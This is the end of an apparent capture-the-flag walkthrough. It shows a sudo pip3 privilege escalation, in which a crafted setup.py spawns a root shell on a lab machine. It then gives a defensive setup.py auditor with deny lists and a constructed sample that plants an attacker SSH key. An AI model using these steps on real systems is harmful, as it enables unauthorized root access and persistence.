sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Matching Defaults entries for low on sneakymailer:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User low may run the following commands on sneakymailer:
    (root) NOPASSWD: /usr/bin/pip3
low@sneakymailer:~$ TF=$(mktemp -d)
low@sneakymailer:~$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
low@sneakymailer:~$ sudo pip3 install $TF
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Processing /tmp/tmp.qRgHUXIOL0
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# cat root.txt
d6b1290eeecc5a53d4fcf94fa26d00c0
~~~
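Both the PyPI upload and the sudo pip3 step work for the same reason: pip runs a package's setup.py with the privileges of whoever performs the install, so credentials for an internal index, or a sudo rule for pip, amount to code execution on every consumer. As an added example on the defensive side (not from the write-up), the following audits an sdist tarball for a setup.py that does more than declare metadata. The two embedded setup.py sources are constructed: one is modelled on the authorized_keys trick above, the other is benign; the deny lists are the example's own choice and are a heuristic, not a complete policy.

```python
"""Added example (not from the write-up): flag setup.py files that execute
side effects at build/install time, inside an sdist given as bytes."""
import ast
import io
import tarfile

# Heuristic deny lists: builtins and modules a metadata-only setup.py never needs.
SUSPICIOUS_CALLS = {"open", "exec", "eval", "compile", "__import__"}
SUSPICIOUS_MODULES = {"os", "subprocess", "socket", "urllib", "requests",
                      "ctypes", "shutil", "pty", "base64"}


def _call_name(node: ast.Call) -> str:
    """Dotted name of the callee: open -> 'open', subprocess.run -> 'subprocess.run'."""
    f = node.func
    if isinstance(f, ast.Name):
        return f.id
    parts = []
    while isinstance(f, ast.Attribute):
        parts.append(f.attr)
        f = f.value
    if isinstance(f, ast.Name):
        parts.append(f.id)
    return ".".join(reversed(parts))


def audit_setup_py(source: str) -> list:
    """Findings for one setup.py source; an empty list means nothing stood out."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in SUSPICIOUS_MODULES:
                    findings.append(f"line {node.lineno}: imports {alias.name}")
        elif isinstance(node, ast.ImportFrom):
            if (node.module or "").split(".")[0] in SUSPICIOUS_MODULES:
                findings.append(f"line {node.lineno}: imports from {node.module}")
        elif isinstance(node, ast.Call):
            name = _call_name(node)
            if name in SUSPICIOUS_CALLS or name.split(".")[0] in SUSPICIOUS_MODULES:
                findings.append(f"line {node.lineno}: calls {name}()")
        elif isinstance(node, ast.Try):
            # `except Exception: pass` around install-time code hides a failing payload.
            for handler in node.handlers:
                if handler.body and all(isinstance(s, ast.Pass) for s in handler.body):
                    findings.append(f"line {node.lineno}: swallowed exceptions in try block")
    return findings


def audit_sdist(data: bytes) -> dict:
    """Audit every setup.py inside an sdist .tar.gz; keys are member paths."""
    results = {}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        for member in tar.getmembers():
            if member.isfile() and member.name.rsplit("/", 1)[-1] == "setup.py":
                src = tar.extractfile(member).read().decode("utf-8", "replace")
                results[member.name] = audit_setup_py(src)
    return results


def build_sdist(dirname: str, setup_py: str) -> bytes:
    """Build a minimal sdist in memory (constructed test input, not a real upload)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        data = setup_py.encode()
        info = tarfile.TarInfo(f"{dirname}/setup.py")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


# Constructed sources: the first mirrors the authorized_keys trick from the post.
MALICIOUS_SETUP = '''\
import setuptools
try:
    with open("/home/low/.ssh/authorized_keys", "a") as f:
        f.write("\\nssh-rsa AAAA...constructed... attacker@host")
except Exception as e:
    pass
setuptools.setup(name="example-pkg3", version="0.0.1",
                 packages=setuptools.find_packages())
'''

BENIGN_SETUP = '''\
import setuptools
setuptools.setup(name="example-pkg3", version="0.0.1",
                 packages=setuptools.find_packages())
'''

if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        for path, findings in audit_sdist(build_sdist("example-pkg3-0.0.1", src)).items():
            print(label, path, findings or "clean")
```

Against a real upload, pass the tarball bytes in (`audit_sdist(open("dist/pkg.tar.gz", "rb").read())`); anything flagged deserves a look before the package is allowed onto an index that other machines install from automatically.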
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE